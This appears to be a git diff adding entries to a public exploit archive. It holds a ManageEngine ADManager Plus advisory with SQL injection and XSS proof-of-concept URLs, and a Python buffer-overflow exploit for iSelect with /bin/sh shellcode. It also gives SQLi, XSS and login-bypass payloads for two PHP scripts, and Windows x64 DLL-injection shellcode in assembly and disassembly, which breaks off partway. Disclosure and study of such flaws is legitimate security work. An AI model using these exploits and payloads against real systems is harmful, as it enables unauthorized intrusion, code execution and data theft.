+Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities
+Application: ManagEnegine Admanager
+Remotely Exploitable: Yes
+Authentication Required: Yes
+Versions Affected: <= 6.5.40
+Technology: Java
+Vendor URL: https://www.manageengine.com/products/ad-manager/
+Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection
+Author: Mehmet Ince
+Date of found: 08 Jan 2017
+
+2. CREDIT
+========================================
+Those vulnerabilities was identified during internal penetration test
+by Mehmet INCE from PRODAFT / INVICTUS.
+
+3. DETAILS
+========================================
+
+3.1 Authenticated Second Order SQL Injection
+-----------------------------------------
+AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with /Report.do enpoint.
+start function of DuplicateComputerLİstener class is as follow (Irrelevant part are omitted.)
+
+public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean)
+ {
+ try
+ {
+ ... OMITTED ...
+
+ this.attrbId = request.getParameter("attrId");
+ this.tableName = request.getParameter("attrTabName");
+ this.attrbName = request.getParameter("attrbColName");
+
+ ... OMITTED ...
+ }
+ catch (Exception e)
+ {
+ e.printStackTrace();
+ }
+ }
+
+It takes user input without validation and set it directly to the class variables such as tableName, attrbName.
+And then deriveData function are going to be called with class variables that under the adversary control
+during complatedAction function execution.
+
+public void completedAction()
+{
+ if (this.updateDetails)
+ {
+ ... OMITTED ...
+
+ deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName);
+
+ ... OMITTED ...
+ }
+ ... OMITTED ...
+}
+
+deriveData function definition is as follow.
+
+public void deriveData(String domainName, String attrbId, String attrbName, String tableName)
+ {
+ ArrayList list = new ArrayList();
+ RelationalAPI relationalAPI = RelationalAPI.getInstance();
+ Connection connection = null;
+ try
+ {
+ TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName);
+ ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName);
+ String dataType = colDef.getDataType();
+ String selctAttrbCol_defaultValue = "'-'";
+ if (!dataType.equals("CHAR")) {
+ ... OMITTED ...
+ }
+ String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;";
+ if (!tableName.equalsIgnoreCase(this.baseTableName))
+ {
+ String selctAttrbCol = tableName + "." + attrbName;
+ String parentAttrbCol = this.baseTableName + ".domain_name";
+
+ String parentTable = this.baseTableName;String childTable = tableName;
+ String parentJoinCol = this.baseTableName + ".object_guid";
+ String childJoinCol = tableName + ".object_guid";
+
+ String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid";
+
+ query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;";
+ }
+ ArrayList result = getResult(query, attrbName);
+
+ ArrayList subList = new ArrayList();
+ if (result.size() > 0)
+ {
+ ... OMITTED ...
+ }
+ if (subList.size() > 0)
+ {
+ ... OMITTED ...
+
+ }
+ else
+ {
+ ... OMITTED ...
+ }
+ }
+ catch (Exception e)
+ {
+ e.printStackTrace();
+ }
+ }
+
+As you can see, database query built with user supplied variable without PDO/ORM.
+
+POC URL : http://12.0.0.136:8080/Report.do?methodToCall=generateReport&action=Generate&domains=DC=acme,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name
+Vulnerable Parameters: attrTabName, attrbColName
+
+IMPORTANT NOTE:
+Since whole process are being called as background job, there is no way to successfully exploitation
+with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to
+exfiltrate data with DNS queries.(http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281)
+
+3.2 Reflected Cross-Site Scripting Issues
+-----------------------------------------
+
+Issue #1
+POC URL : http://12.0.0.136:8080/ObjectProperties.do?selectedTab=home&guid={0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a
+Parameters: domainName
+
+Issue #2
+POC URL: http://12.0.0.136:8080/DelegationAudit.do?methodToCall=finish&selectedTab=delegation&selectedTile=delegationAudit&action='"-->&init=true
+Vulnerable Parameters: action
+
+Issue #3
+POC URL: http://12.0.0.136:8080/HDTTemplates.do?technicianId=1&domainName='"-->
+Vulnerable Parameters: domainName
+
+Issue #4
+POC URL: http://12.0.0.136:8080/jsp/reports/ExportReport.jsp?reportList=true&reportId=43&waadAccId=/'onload='alert(9)
+Vulnerable Parameters: waadAccId
+
+Issue #5
+POC URL: http://12.0.0.136:8080/MgmtAutomation.do?selectedTab=automation&selectedTile=mgmtAutomation&methodToCall=scheduledAutomationCreation&actionType='"-->
+Vulnerable Parameters: actionType
+
+Issue #6
+POC URL: http://12.0.0.136:8080/ObjectProperties.do?guid={0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"-->&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf=
+Vulnerable Parameters: objectClass, domainName
+
+Issue #7
+POC URL: http://12.0.0.136:8080/PopupInputSelection.do?methodToCall=selectContainer&domainName='"-->&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local
+Vulnerable Parameters: domainName, id, container
+
+Issue #8
+POC URL: http://12.0.0.136:8080/Report.do?selectedTab=reports&methodToCall=report&init=true&reportTab='"-->&tileName=Compliance Reports
+Vulnerable Parameters: reportTab, tileName, categoryId,
+
+Issue #9
+POC URL: http://12.0.0.136:8080/AdvancedFilter.do?beanName=ReportBean&domainName='"-->&distinguishedName=DC=acme,DC=local
+Vulnerable Parameters: domainName, distinguishedName
+
+Issue #10
+POC URL: http://12.0.0.136:8080/ViewSIDs.do?domainName='"-->&permissionType=folder
+Vulnerable Parameters: permissionType, domianName
+
+Issue #11
+POC URL: http://12.0.0.136:8080/computerList.do?defaultNamingContext=DC=acme,DC=local&textField='"-->
+Vulnerable Parameters: textField
+
+Issue #12
+POC URL: http://12.0.0.136:8080/ViewObjects.do?defaultNamingContext=x'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false
+Vulnerable Parameters: defaultNamingContext,modelName, showDomain
+
+Issue #13
+POC URL: http://12.0.0.136:8080/groupList.do?defaultNamingContext=DC=acme,DC=local&modifyType='"-->&beanName=undefined&type=single
+Vulnerable Parameters: modifyType, beanName
+
+
+4. TIMELINE
+========================================
+06 Jan 2017 - Netsparker identified several XSS vulnerabilities.
+07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team.
+07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team.
+08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms.
+09 Jan 2017 - Vendor notified.
+09 Jan 2017 - Vendor acknowledge the report.
+13 Jan 2017 - Vendor replied with patch.
+13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team.
+16 Jan 2017 - Advisory released (https://www.manageengine.com/products/ad-manager/release-notes.html)
diff --git a/platforms/linux/local/41076.py b/platforms/linux/local/41076.py
new file mode 100755
index 000000000..f74f487c6
--- /dev/null
+++ b/platforms/linux/local/41076.py
@@ -0,0 +1,63 @@
+# Exploit developed using Exploit Pack v7.01
+# Exploit Author: Juan Sacco - http://www.exploitpack.com -
+jsacco@exploitpack.com
+# Program affected: iSelect
+# Affected value: -k, --key=KEY
+# Version: 1.4.0-2+b1
+#
+# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
+# Program description: ncurses-based interactive line selection tool
+# iSelect is an interactive line selection tool, operating via a
+# full-screen Curses-based terminal session.
+
+# Kali Linux 2.0 package: pool/main/i/iselect/iselect_1.4.0-2+b1_i386.deb
+# MD5sum: d5ace58e0f463bb09718d97ff6516c24
+# Website: http://www.ossp.org/pkg/tool/iselect/
+
+# Where in the code:
+#7 0xb7eaa69f in __strcpy_chk (dest=0xbfffeccc
+"1\243\376\267\070\360\377\277", src=0xbffff388 "=", 'A' ..., destlen=1024) at strcpy_chk.c:30
+#8 0x0804bfaa in ?? ()
+#9 0x0804914d in ?? ()
+#10 0xb7dcd276 in __libc_start_main (main=0x8048f50, argc=2,
+argv=0xbffff224, init=0x804c020, fini=0x804c090, rtld_fini=0xb7fea8a0
+<_dl_fini>, stack_end=0xbffff21c) at ../csu/libc-start.c:291
+
+
+# Exploit code: Proof of Concept ( Without Fortify )
+import os, subprocess
+
+def run():
+ try:
+ print "# iSelect - Local Buffer Overflow by Juan Sacco"
+ print "# This Exploit has been developed using Exploit Pack -
+http://exploitpack.com"
+ # NOPSLED + SHELLCODE + EIP
+
+ buffersize = 1024
+ nopsled = "\x90"*30
+ shellcode =
+"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+ eip = "\x08\xec\xff\xbf"
+ buffer = nopsled * (buffersize-len(shellcode)) + eip
+ subprocess.call(["iselect -k=",'', buffer])
+
+ except OSError as e:
+ if e.errno == os.errno.ENOENT:
+ print "Sorry, iSelect binary - Not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Snap! Something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit iSelect - Local Overflow Exploit"
+ print "Author: Juan Sacco - Exploit Pack"
+ except IndexError:
+ howtousage()
+run()
diff --git a/platforms/php/webapps/41075.txt b/platforms/php/webapps/41075.txt
new file mode 100755
index 000000000..ea7567073
--- /dev/null
+++ b/platforms/php/webapps/41075.txt
@@ -0,0 +1,26 @@
+# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
+Persistent Cross Site Scripting
+# Author : ----------------- : Ahmet Gurel
+# Google Dork : --------- : -
+# Date : -------------------- : 16/01/2017
+# Type : -------------------- : webapps
+# Platform : --------------- : PHP
+# Vendor Homepage : http://itechscripts.com/business-networking-script/
+# Sofware Price and Demo : $299.00
+http://professional-network.itechscripts.com
+
+ ########## 1-SQL Injection ##########
+
+##### Vulnerable Parameter Type : GET
+##### Vulnerable Parameter : gid
+##### Vulnerable URL :
+http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
+##### SQLi Parameter : ' OR '1'='1
+
+
+
+########## 2-Persistent XSS Payload ##########
+
+##### Vulnerable URL : http://localhost/[PATH]/home.php
+##### Vuln. Parameter: first_name=
+##### PAYLOAD : '"-->
diff --git a/platforms/php/webapps/41080.txt b/platforms/php/webapps/41080.txt
new file mode 100755
index 000000000..ff435cc52
--- /dev/null
+++ b/platforms/php/webapps/41080.txt
@@ -0,0 +1,64 @@
+Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
+Author : Hasan Emre Ozer
+Google Dork : -
+Date : 16/01/2017
+Type : webapps
+Platform: PHP
+Vendor Homepage : http://itechscripts.com/image-sharing-script/
+Sofware Price and Demo : $1250
+http://photo-sharing.itechscripts.com/
+
+--------------------------------
+Type: Reflected XSS
+Vulnerable URL: http://localhost/[PATH]/searchpin.php
+Vulnerable Parameters : q=
+Payload:">
+-------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
+Vulnerable Parameters: pid
+Method: GET
+Payload: ' AND (SELECT 2674 FROM(SELECT
+COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+-------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/categorypage.php
+Vulnerable Parameters: token
+Method: GET
+Payload: ' AND (SELECT 2674 FROM(SELECT
+COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+
+--------------------------------
+Type: Reflected XSS
+Vulnerable URL: http://localhost/[PATH]/categorypage.php
+Vulnerable Parameters : token
+Payload:">
+
+-------------------------------
+Type: Stored XSS
+Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
+Method: POST
+Vulnerable Parameters : &text=
+Payload:
+--------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
+Vulnerable Parameters: id
+Method: POST
+Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+---------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
+Vulnerable Parameters: brdId
+Method: POST
+Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+
+
diff --git a/platforms/php/webapps/41081.txt b/platforms/php/webapps/41081.txt
new file mode 100755
index 000000000..e834c4ef5
--- /dev/null
+++ b/platforms/php/webapps/41081.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability: Authentication Bypass
+# Date: 16.01.2017
+# Vendor Homepage: http://e-topbiz.com/
+# Script Name: Million Pixels 3
+# Script Buy Now: http://www.e-topbiz.com/oprema/pages/millionpixels3.php
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
diff --git a/platforms/win_x86-64/shellcode/41072.c b/platforms/win_x86-64/shellcode/41072.c
new file mode 100755
index 000000000..cc5e25724
--- /dev/null
+++ b/platforms/win_x86-64/shellcode/41072.c
@@ -0,0 +1,692 @@
+/*
+
+ Title: Windows x64 dll injection shellcode (using CreateRemoteThread())
+ Size: 584 bytes
+ Date: 16-01-2017
+ Author: Roziul Hasan Khan Shifat
+ Tested On : Windows 7 x64
+
+
+
+
+
+
+*/
+
+
+
+//Note : i wrtie it for process injection
+//It may work in exploit
+
+
+
+/*
+
+section .text
+ global _start
+_start:
+xor r8,r8
+push r8
+push r8
+
+mov [rsp],dword 'expl'
+mov [rsp+4],dword 'orer'
+mov [rsp+8],dword '.exe'
+
+lea rcx,[rsp] ;;process name (explorer.exe) change it if U want
+
+
+push r8
+push r8
+push r8
+
+
+
+mov [rsp],dword 'C:\U'
+mov [rsp+4],dword 'sers'
+mov [rsp+8],dword '\Pub'
+mov [rsp+12],dword 'lic\'
+mov [rsp+16],dword 'in.d'
+mov [rsp+20],word 'll'
+
+lea rdx,[rsp] ;path of the dll (change it to U full path of dll)
+
+
+
+
+;--------------------------------------------------------
+
+mov r8w,336
+
+sub rsp,r8
+lea r12,[rsp]
+
+push 24
+pop r8 ;(important: length of dll path string including null byte)
+
+
+mov [r12],rcx ;process name
+mov [r12+8],rdx ;dll path
+mov [r12+16],r8 ;length of dll path string
+
+;----------------------------------------------------------
+
+
+
+
+
+_main:
+
+cdq
+mov rax,[gs:rdx+0x60] ;peb
+mov rax,[rax+0x18] ;peb->Ldr
+mov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList
+lodsq
+mov rsi,[rax]
+mov rdi,[rsi+0x30] ;rdi=kernel32.dll base address
+
+
+
+;------------------------------------------
+mov dl,0x88
+mov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew
+add rbx,rdi ;IMAGE_OPTIONAL_HEADER32
+mov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress
+add rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)
+
+mov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction
+add rsi,rdi
+
+;-------------------------------------------------------
+;loading msvcrt.dll
+cdq
+push rdx
+mov dx,832
+mov ebx,[rsi+rdx*4]
+add rbx,rdi
+
+
+mov [rsp],dword 'msvc'
+mov [rsp+4],word 'rt'
+
+lea rcx,[rsp]
+
+sub rsp,88
+
+call rbx
+
+;-------------------------------
+;Finding address of strcmp()
+
+lea rdx,[rsp+88]
+mov [rdx],dword 'strc'
+mov [rdx+4],word 'mp'
+
+mov rcx,rax
+
+mov r8w,587*4
+mov ebx,[rsi+r8]
+add rbx,rdi
+
+call rbx
+;-----------------------------
+mov [r12+24],rax ;address of strcmp()
+;---------------------------------------------------------------
+
+mov dx,190*4
+mov ebx,[rsi+rdx]
+add rbx,rdi ;CreateToolhelp32Snapshot()
+
+;--------------------------------
+
+;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
+xor rdx,rdx ;DWORD th32ProcessID
+push 2
+pop rcx ;DWORD dwFlags
+call rbx
+
+mov r13,rax ;HANDLE
+cmp r13,-1
+je __exit
+;---------------------------------------------
+mov dx,304
+
+mov [r12+32],dword edx ;sizeof PROCESSENTRY32
+
+
+
+mov dx,920*4
+mov ebx,[rsi+rdx]
+add rbx,rdi ;rbx=Process32First()
+
+;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
+
+lea rdx,[r12+32] ;LPPROCESSENTRY32 lppe
+mov rcx,r13 ;HANDLE hSnapshot
+
+
+call rbx
+
+cmp rax,1
+jne __exit
+
+;---------------------------------------------------
+
+xor rdx,rdx
+mov dx,922*4
+mov r15d,[rsi+rdx]
+add r15,rdi ;r15=Process32Next()
+
+
+
+sub rsp,88
+get_pid:
+lea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]
+mov rdx,[r12] ;process name
+mov rbx,[r12+24] ;strcmp()
+call rbx
+
+xor rdx,rdx
+cmp rax,rdx
+jz inject
+
+;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
+mov rcx,r13
+lea rdx,[r12+32]
+call r15
+
+cmp rax,1
+je get_pid
+
+leave
+ret
+
+
+
+
+
+
+
+
+
+
+__exit:
+xor rdx,rdx
+push rdx
+mov dx,297*4
+mov ebx,[rsi+rdx]
+add rbx,rdi
+
+pop rcx
+call rbx
+
+
+
+
+
+
+
+
+
+
+;--------------------------------------------------
+;------------------------------------------------------
+;inject function
+inject:
+
+xor rdx,rdx
+push rdx
+pop r10
+
+mov r10w,899*4
+mov ebx,[rsi+r10]
+add rbx,rdi ;rbx=OpenProcess()
+
+;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)
+
+push rdx
+pop rcx
+
+mov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID
+
+;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)
+
+mov ecx,0x1e84800a
+sub ecx,0x1e65700b
+
+call rbx
+
+mov r13,rax ;PROCESS HANDLE
+cmp r13,-1
+je __exit
+;--------------------------------------------------------------------
+
+mov dx,1279
+mov ebx,[rsi+rdx*4]
+add rbx,rdi ;VirualAlloc()
+
+;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
+sub rsp,88
+
+mov rcx,r13 ;HANDLE hProcess
+xor rdx,rdx ;LPVOID lpAddress
+mov r8,[r12+16] ;SIZE_T dwSize
+mov r9w,0x2fff
+inc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)
+mov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE
+call rbx
+
+mov r14,rax ;LPVOID address
+xor rdx,rdx
+cmp rax,rdx
+jz __exit
+
+
+;-----------------------------------------------------------------------------------
+mov dx,1347
+mov ebx,[rsi+rdx*4]
+add rbx,rdi ;WriteProcessMemory()
+sub rsp,88
+xor rdx,rdx
+;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
+mov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten
+mov rcx,r13 ;HANDLE hProcess
+mov rdx,r14 ;LPVOID lpBaseAddress
+mov r8,[r12+8] ;LPCVOID lpBuffer
+mov r9,[r12+16] ;SIZE_T nSize
+
+call rbx
+
+
+
+cmp rax,1
+jne __exit
+
+;------------------------------------------------------------------------------------
+mov dx,170*4
+mov ebx,[rsi+rdx]
+add rbx,rdi ;CreateRemoteThread()
+
+xor rdx,rdx
+sub rsp,88
+;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
+
+mov rcx,r13 ;HANDLE hProcess
+push rdx
+push rdx
+pop r8 ;SIZE_T dwStackSize
+
+mov dx,832
+mov r9d,[rsi+rdx*4]
+add r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())
+
+pop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes
+mov [rsp+32],r14 ;LPVOID lpParameter
+mov [rsp+40],r8
+mov [rsp+48],r8
+call rbx
+
+call __exit
+
+;------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+*/
+
+
+
+/*
+
+
+
+dll_inj.obj: file format pe-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <_start>:
+ 0: 4d 31 c0 xor %r8,%r8
+ 3: 41 50 push %r8
+ 5: 41 50 push %r8
+ 7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)
+ e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)
+ 15: 72
+ 16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)
+ 1d: 65
+ 1e: 48 8d 0c 24 lea (%rsp),%rcx
+ 22: 41 50 push %r8
+ 24: 41 50 push %r8
+ 26: 41 50 push %r8
+ 28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)
+ 2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)
+ 36: 73
+ 37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)
+ 3e: 62
+ 3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)
+ 46: 5c
+ 47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)
+ 4e: 64
+ 4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)
+ 56: 48 8d 14 24 lea (%rsp),%rdx
+ 5a: 66 41 b8 50 01 mov $0x150,%r8w
+ 5f: 4c 29 c4 sub %r8,%rsp
+ 62: 4c 8d 24 24 lea (%rsp),%r12
+ 66: 6a 18 pushq $0x18
+ 68: 41 58 pop %r8
+ 6a: 49 89 0c 24 mov %rcx,(%r12)
+ 6e: 49 89 54 24 08 mov %rdx,0x8(%r12)
+ 73: 4d 89 44 24 10 mov %r8,0x10(%r12)
+
+0000000000000078 <_main>:
+ 78: 99 cltd
+ 79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
+ 7e: 48 8b 40 18 mov 0x18(%rax),%rax
+ 82: 48 8b 70 10 mov 0x10(%rax),%rsi
+ 86: 48 ad lods %ds:(%rsi),%rax
+ 88: 48 8b 30 mov (%rax),%rsi
+ 8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi
+ 8f: b2 88 mov $0x88,%dl
+ 91: 8b 5f 3c mov 0x3c(%rdi),%ebx
+ 94: 48 01 fb add %rdi,%rbx
+ 97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
+ 9a: 48 01 fb add %rdi,%rbx
+ 9d: 8b 73 1c mov 0x1c(%rbx),%esi
+ a0: 48 01 fe add %rdi,%rsi
+ a3: 99 cltd
+ a4: 52 push %rdx
+ a5: 66 ba 40 03 mov $0x340,%dx
+ a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ ac: 48 01 fb add %rdi,%rbx
+ af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)
+ b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)
+ bd: 48 8d 0c 24 lea (%rsp),%rcx
+ c1: 48 83 ec 58 sub $0x58,%rsp
+ c5: ff d3 callq *%rbx
+ c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx
+ cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)
+ d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)
+ d8: 48 89 c1 mov %rax,%rcx
+ db: 66 41 b8 2c 09 mov $0x92c,%r8w
+ e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx
+ e4: 48 01 fb add %rdi,%rbx
+ e7: ff d3 callq *%rbx
+ e9: 49 89 44 24 18 mov %rax,0x18(%r12)
+ ee: 66 ba f8 02 mov $0x2f8,%dx
+ f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ f5: 48 01 fb add %rdi,%rbx
+ f8: 48 31 d2 xor %rdx,%rdx
+ fb: 6a 02 pushq $0x2
+ fd: 59 pop %rcx
+ fe: ff d3 callq *%rbx
+ 100: 49 89 c5 mov %rax,%r13
+ 103: 49 83 fd ff cmp $0xffffffffffffffff,%r13
+ 107: 74 60 je 169 <__exit>
+ 109: 66 ba 30 01 mov $0x130,%dx
+ 10d: 41 89 54 24 20 mov %edx,0x20(%r12)
+ 112: 66 ba 60 0e mov $0xe60,%dx
+ 116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ 119: 48 01 fb add %rdi,%rbx
+ 11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx
+ 121: 4c 89 e9 mov %r13,%rcx
+ 124: ff d3 callq *%rbx
+ 126: 48 83 f8 01 cmp $0x1,%rax
+ 12a: 75 3d jne 169 <__exit>
+ 12c: 48 31 d2 xor %rdx,%rdx
+ 12f: 66 ba 68 0e mov $0xe68,%dx
+ 133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d
+ 137: 49 01 ff add %rdi,%r15
+ 13a: 48 83 ec 58 sub $0x58,%rsp
+
+000000000000013e :
+ 13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx
+ 143: 49 8b 14 24 mov (%r12),%rdx
+ 147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx
+ 14c: ff d3 callq *%rbx
+ 14e: 48 31 d2 xor %rdx,%rdx
+ 151: 48 39 d0 cmp %rdx,%rax
+ 154: 74 24 je 17a
+ 156: 4c 89 e9 mov %r13,%rcx
+ 159: 49 8d 54 24 20 lea 0x20(%r12),%rdx
+ 15e: 41 ff d7 callq *%r15
+ 161: 48 83 f8 01 cmp $0x1,%rax
+ 165: 74 d7 je 13e
+ 167: c9 leaveq
+ 168: c3 retq
+
+0000000000000169 <__exit>:
+ 169: 48 31 d2 xor %rdx,%rdx
+ 16c: 52 push %rdx
+ 16d: 66 ba a4 04 mov $0x4a4,%dx
+ 171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ 174: 48 01 fb add %rdi,%rbx
+ 177: 59 pop %rcx
+ 178: ff d3 callq *%rbx
+
+000000000000017a :
+ 17a: 48 31 d2 xor %rdx,%rdx
+ 17d: 52 push %rdx
+ 17e: 41 5a pop %r10
+ 180: 66 41 ba 0c 0e mov $0xe0c,%r10w
+ 185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
+ 189: 48 01 fb add %rdi,%rbx
+ 18c: 52 push %rdx
+ 18d: 59 pop %rcx
+ 18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d
+ 193: b9 0a 80 84 1e mov $0x1e84800a,%ecx
+ 198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx
+ 19e: ff d3 callq *%rbx
+ 1a0: 49 89 c5 mov %rax,%r13
+ 1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13
+ 1a7: 74 c0 je 169 <__exit>
+ 1a9: 66 ba ff 04 mov $0x4ff,%dx
+ 1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 1b0: 48 01 fb add %rdi,%rbx
+ 1b3: 48 83 ec 58 sub $0x58,%rsp
+ 1b7: 4c 89 e9 mov %r13,%rcx
+ 1ba: 48 31 d2 xor %rdx,%rdx
+ 1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8
+ 1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w
+ 1c7: 49 ff c1 inc %r9
+ 1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)
+ 1cf: ff d3 callq *%rbx
+ 1d1: 49 89 c6 mov %rax,%r14
+ 1d4: 48 31 d2 xor %rdx,%rdx
+ 1d7: 48 39 d0 cmp %rdx,%rax
+ 1da: 74 8d je 169 <__exit>
